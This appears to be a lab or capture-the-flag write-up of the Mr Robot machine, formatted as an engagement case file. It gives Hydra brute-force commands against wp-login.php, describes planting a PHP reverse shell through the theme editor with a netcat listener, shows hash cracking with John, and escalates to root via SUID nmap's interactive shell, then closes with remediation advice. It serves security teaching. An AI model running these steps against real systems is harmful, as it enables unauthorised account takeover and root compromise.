WordPress brute force, robot hash crack, and SUID nmap root
Intermediate Linux engagement: robots.txt leaked a wordlist and first artifact; Hydra recovered elliot’s WordPress password for a theme-editor shell; robot’s MD5 cracked for su; SUID nmap --interactive completed root.
- Case files
- WordPress brute force, robot hash crack, and SUID nmap root
robots.txt and a custom dictionary enabled WordPress credential recovery. Post-auth theme edit yielded www-data; robot’s password hash and SUID nmap finished the path to root.
fsocity.dic plus Hydra recovered elliot:ER28-0652 on wp-login.php.
PHP reverse shell via theme editor; cracked robot MD5 for local su.
nmap --interactive accepted !sh and dropped a root shell.
Engagement summary
robots.txt and a custom dictionary enabled WordPress credential recovery. Post-auth theme edit yielded www-data; robot’s password hash and SUID nmap finished the path to root.
MR ROBOT exposed WordPress on 80/443. robots.txt advertised fsocity.dic and key-1-of-3.txt. After sorting the dictionary we sprayed wp-login.php: username elliot, password ER28-0652 (also recoverable from a base64 string on a license page). Appearance → Editor accepted a PHP reverse shell. /home/robot/password.raw-md5 was world-readable; John cracked it to abcdefghijklmnopqrstuvwxyz for su robot. find showed SUID nmap 3.81; nmap --interactive then !sh returned a root shell.
Business impact
Leaked wordlists and weak WordPress passwords are account takeover. Theme editing is RCE. World-readable password hashes and ancient SUID nmap are root. Remove robots leaks, enforce MFA and strong WP passwords, disable theme editing, fix home permissions, and remove SUID from nmap.
robots leak and WordPress spray
fsocity.dic plus Hydra recovered elliot:ER28-0652 on wp-login.php.
OPERATOR · RECON
savvy@lab:~$ nmap -sC -sV -Pn 10.10.50.10
80/tcp open http
443/tcp open https
savvy@lab:~$ curl http://10.10.50.10/robots.txt
fsocity.dic
key-1-of-3.txt
savvy@lab:~$ sort fsocity.dic | uniq > fsocity-sorted.dic
OPERATOR · HYDRA
savvy@lab:~$ hydra -L fsocity-sorted.dic -p test 10.10.50.10 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:Invalid username"
login: elliot
savvy@lab:~$ hydra -l elliot -P fsocity-sorted.dic 10.10.50.10 http-post-form "/wp-login.php:log=^USER^&pwd=^PASS^&wp-submit=Log+In:The password you entered"
login: elliot password: ER28-0652
Theme editor shell and robot hash
PHP reverse shell via theme editor; cracked robot MD5 for local su.
OPERATOR · SHELL / ROBOT
# WP Admin → Appearance → Editor → paste PHP reverse shell into 404.php
savvy@lab:~$ nc -lnvp 4444
savvy@lab:/var/www/html$
savvy@lab:~$ cat /home/robot/password.raw-md5
savvy@lab:~$ john --format=Raw-MD5 --wordlist=rockyou.txt hash.txt
abcdefghijklmnopqrstuvwxyz (robot)
savvy@lab:~$ su robot
savvy@lab:~$
SUID nmap interactive root
nmap --interactive accepted !sh and dropped a root shell.
OPERATOR · NMAP SUID
savvy@lab:~$ find / -perm -u=s -type f 2>/dev/null
/usr/local/bin/nmap
savvy@lab:~$ nmap --interactive
nmap> !sh
root@lab:~# id
uid=0(root) gid=0(root) groups=0(root)
Remediation
Remove sensitive paths from robots.txt. Harden WordPress authentication and disable file editing. Store password hashes with proper permissions. Upgrade nmap and never ship it SUID.